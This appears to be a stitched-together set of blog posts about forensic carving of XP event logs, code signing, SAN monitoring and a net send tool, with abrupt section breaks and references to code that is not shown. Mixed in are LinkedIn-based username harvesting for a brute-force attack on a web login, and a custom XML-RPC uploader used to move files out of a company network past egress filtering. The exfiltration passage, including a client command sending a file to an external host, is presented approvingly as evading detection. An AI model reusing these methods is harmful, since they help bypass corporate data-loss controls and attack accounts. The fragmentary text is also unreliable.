I had an image from a windows XP machine which was badly damaged and could not be mounted. I needed to recover event logs ( the *evt files ) from it. Since the logs are binary, and Unicode or ASCII search would have not turned up anything, I used foremost tool on Linux.

The hex signature of the evt file is :

\x30\x00\x00\x00\x4c\x66\x4c\x65\x01\x00\x00\x00\x01\x00\x00\x00

Knowing this, I have constructed a formost config file notifying the tool of how exactly I wanted the data carved. With the following configuration in the /usr/local/etc/foremost.conf.evt config file:

evt y 512000 \x30\x00\x00\x00\x4c\x66\x4c\x65\x01\x00\x00\x00\x01\x00\x00\x00

the tool will search for a signature and recover at most 512000 bytes, which should be enough to read evt with some custom python script or use fccu.evtreader.pl ( www.d-fence.be ).

So, the recovery goes like that:
1. Construct recovery command for foremost:

$ foremost -v -T -c /usr/local/etc/foremost.conf.evt -t all -i /z/image.dd

This will extract a binary evt file ( like 00000000.evt ) from the image.dd

2. Run

$ fccu.evtreader.pl 00000000.evt

and get ascii lines back for further processing.

At the time I was preparing to pen-test a company;s PeopleSoft web interface to Accounts Payable/ Accounts Receivable stuff. Of course, there was no correlation between these 2 activities except for the fact that Linked-in made my recon phase of the test that much easier. This wonderful site allowed me to generate a dictionary of possible first and last names of people currently working for the company. Given the fact and some other clues, I was able to infer user login policy to the Website interface. All I had to do is search for current employees of the particular company. Forget Monster profiles ( who knows how updated they are ). Forget searching for emails on Google. Login to Linked -in and having at least one sufficiently connected peer in your network( 500 references in my case ), I was able to find 145 people currently working for the company. Of them, 18 were execs and 34 were technical people with resumes reflecting technology they worked on at the company.

Needless to say the dictionary of first/last names were fed into brute-forcer against the web interface I was testing. 20 minutes later I got “Password invalid” for a valid user…. Interestingly enough, the valid user turned out to be an HR guy who never changed his password.

I wonder if anyone had taken it further to do some social engineering stuff ?

A lot of “normal” ways of transferring data from the company were already restricted, including ssh, mail attachments, and even USB and CDROMs were locked. So, I had to really either print the source code and retype it later or come up with a way to transfer files reliably. Proxy servers did not allow access to the usual upload facilities like Rapidshare, etc. One option was to connect via port 80 somewhere and upload the file…. The company allowed only POST and GET egress. Pain in the butt… or …. good security…. unfortunately visits to my home page were prohibited by Websense under “Personal homepages” policy. Not much to do. So thinking more about it, I decided to take down my home site, and mount an XML-RPC service on port 80 instead. Tweaking things here and there, it looked promising. Here’s a client and server I wrote to finally copy binary/text files via my webservice. I based it on Twisted Python – great stuff.


dimas@moo ~/scripts/python/twisted $ ls -l ~/Desktop/video.wmv
-rw-r--r-- 1 dimas dimas 7732360 May 14 16:37 /home/dimas/Desktop/video.wmv

dimas@moo ~/scripts/python/twisted $ ./xmlrpc_client.py ~/Desktop/video.wmv ‘http://externalsite:80′
[c]Preparing for service at: http://externalsite:80
[c]Connected to http://externalsite:80
[c]Uploading file /home/dimas/Desktop/video.wmv
[c]Client digest:1a0444dff540bd641d23d28e21288804e6fd0735
[s]Server digest:1a0444dff540bd641d23d28e21288804e6fd0735
[c]File upload status: UPLD_OK

It was a success. XML-RPC calls went undetected ( or at least not prevented ). Also, if anyone visits externalsite:80 they will not see the usual upload page… which is always better anyways.

Here is the code. I checksum the data with sha-1, base64 -encode it on one end and reverse it on the other.

XML-RPC twisted client

XML-RPC twisted server

So, really, how are people going to fix this? Unless they do some really intelligent packet inspection and know business logic, it’s hard to do. The XML-RPC clients/servers are mostly custom within organisations, and one needs to educate the parsing software of the proper rules.

Prerequisites I needed

1. Install .Net Framework 2.0
2. Install MSH windows shell
3. Install .Net Development SDK

Note: in this example SRVR ( W2k3 ) server is used as local CA
and ACCT as admin account to run under

Procedure I followed:

1. Login to SRVR as ACCT account
2. Start->Run : type msh

I. Make certificate Authority ( Only one time )

## Create certificate Authority keypair and certificate
MSH> makecert -n “CN=Company Local CA2, O=CompanyBuild, C=US, S=Illinois, O=Company, OU=Chicago” -a sha1 -eku 1.3.6.1.5.5.7.3.3 -r -sv root.pvk root.cer -ss Root -sr localMachine
Succeeded

## Check if it was created
MSH> get-childitem cert:\localmachine\root

Subject : CN=Company Local CA2, O=Company Build,
C=US, S=Illinois, O=Company, OU=Chicago
Issuer : CN=Company Local CA2, O=Company Build,
C=US, S=Illinois, O=Company, OU=Chicago
Thumbprint : FCD5D33001132C770CF0627424B1F2

1E9EECD6DD

FriendlyName :
NotBefore : 3/22/2007 3:11:15 PM
NotAfter : 12/31/2039 5:59:59 PM
Extensions : {System.Security.Cryptography.Oid,
System.Security.Cryptography.Oid}

II. Make Certificate signing Authority ( only one time )

## Create signing authority and sign the certificate by local CA
MSH> makecert -pe -n “CN=Company Local CA2 Signing Validation,
O=Company Build, C=US, S=Illinois OU=Chicago” -ss CF -a
sha1 -eku 1.3.6.1.5.5.7.3.3 -iv root.pvk -ic root.cer
Succeeded

## Check it was created
MSH> get-childitem cert:\currentuser\CF

Subject : CN=Company Local CA2 Signing Validation,
O=Company Build, C=US, S=”Illinois OU=Chicago”
Issuer : CN=Company Local CA2, O=Company Build,
C=US, S=Illinois, O=Company, OU=Chicago
Thumbprint : E748B0B01AFA1B3CC27B268E7FEB2698D6FA6B95
FriendlyName :
NotBefore : 3/22/2007 3:19:02 PM
NotAfter : 12/31/2039 5:59:59 PM
Extensions : {System.Security.Cryptography.Oid,
System.Security.Cryptography.Oid}

III Sign a file ( every time )

## In case you have multiple CAs installed, select the one certificate
you need ( array element )
MSH> $cert=(get-childitem cert:\currentuser\CF)[1]

## Sign EXE/CAB/DLL/MSH files
MSH> set-authenticodeSignature “c:\Tools\fport\Fport-2.0\fport.exe” $cert

SignerCertificate : [Subject]
CN=Company Local CA2 Signing
Validation, O=Company Build, C=US, S=”Illinois
OU=Chicago”

[Issuer]
CN=Company Local CA2,
O=Company Build, C=US, S=Illinois, O=Company,
OU=Chicago

[Serial Number]
DB0F9C8A691755074AAF551F570DE4E5

[Not Before]
3/22/2007 3:19:02 PM

[Not After]
12/31/2039 5:59:59 PM

[Thumbprint]
E748B0B01AFF1B5FC27B268E7FEB2698D6FA6B95

TimeStamperCertificate :
Status : Valid
StatusMessage : Signature verified.
Path : C:\Tools\fport\Fport-2.0\fport.exe

IV Test and distribute the signed file

The cron entries:

### San switch 1
00,05,10,15,20,25,30,35,40,45,50,55 * * * *
/usr/local/scripts/monitoring/BrocadePortPerf.pl –switch=10.4.15.202
–collog=/var/log/collect/sanportstats >> /var/log/brocadeperf.sw1.log 2>&1

### San switch 2
00,05,10,15,20,25,30,35,40,45,50,55 * * * *
/usr/local/scripts/monitoring/BrocadePortPerf.pl –switch=10.4.15.203
–collog=/var/log/collect/sanportstats >> /var/log/brocadeperf.sw2.log 2>&1

### San port layout
00 6 * * * /usr/local/scripts/monitoring/wwn2port.pl –switch=10.4.15.202
–switch=10.4.15.203 >>/var/log/wwwn2port.pl.log 2>&1

##### Generate San Port Performance graphs
10 * * * * /usr/local/scripts/monitoring/generateAll4Day.sh >>
/var/log/generateAll4Day.sh.log 2>&1

And the respective scripts:

Brocade port performance collector BrocadePortPerf.pl

Web stats generator GenPortStats.pl

WWN2Port converter wwn2port.pl

The web frontend is fed from the collected information such as :

epoch time|humandate|ip:port|stats 15 second interval|(M)aximum, (A)verage for the past interval

1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port6 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port1 | 0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00:0.00 | M=0.00, A=0.00
1171086918 | 23:55:18, Fri Feb 9, 2007 | 10.4.15.203:Port9 | 0.01:0.01:0.25:0.01:0.03:0.26:0.08:0.26:0.03:0.34:0.02:0.27:0.27:0.00:0.00:0.02 | M=0.34, A=0.12

Web looks like Date –> IP –> Port –> Max/Average like so:

At the end of the run it gives a summary of Ips delivered/failed. I have created it to overcome one problem in an environment where messages to users were sent via net send ( manually ! ).

Since I was at it, CGI interface is included as well.

As I think of it, this may be used as footprinting workstations being able to receive the messages. I should try that next time

P.S. I cannot upload tarball So I have scanned 3 files:

Netsend.pl netsend.pl

Netsend.cgi netsend.cgi and

Netsend.lgr netsend.lgr in PDF format.